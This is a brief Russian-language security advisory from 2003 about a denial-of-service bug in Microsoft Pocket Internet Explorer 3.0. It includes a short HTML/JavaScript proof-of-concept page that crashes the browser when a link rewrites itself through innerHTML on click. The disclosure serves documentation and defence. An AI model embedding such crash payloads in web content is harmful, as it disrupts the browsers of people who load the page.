DoS против Microsoft Pocket Internet Explorer

Дата публикации:
08.01.2003
Всего просмотров:
952
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Обнаруженная уязвимость позволяет злонамеренной Web странице, содержащей некорректный JavaScript код, аварийно завершить работу Microsoft Pocket Internet Explorer. Пример:
<html>
<head>
<title>Crash PIE</title>
<script language="Javascript">
function displayPage(page){
if(page=="onload"){
   main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">Crash 
me</a>";
}
if(page=="crash"){
   main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">You are 
going down!</a>";
}
}
</script>
</head>
<body onLoad="displayPage('onload');">
<hr>
<span id="main"></span>
</body></html>
Уязвимость обнаружена в Microsoft Pocket Internet Explorer 3.0

Ссылки: JS Bug makes it possible to deliberately crash Pocket PC IE
или введите имя

CAPTCHA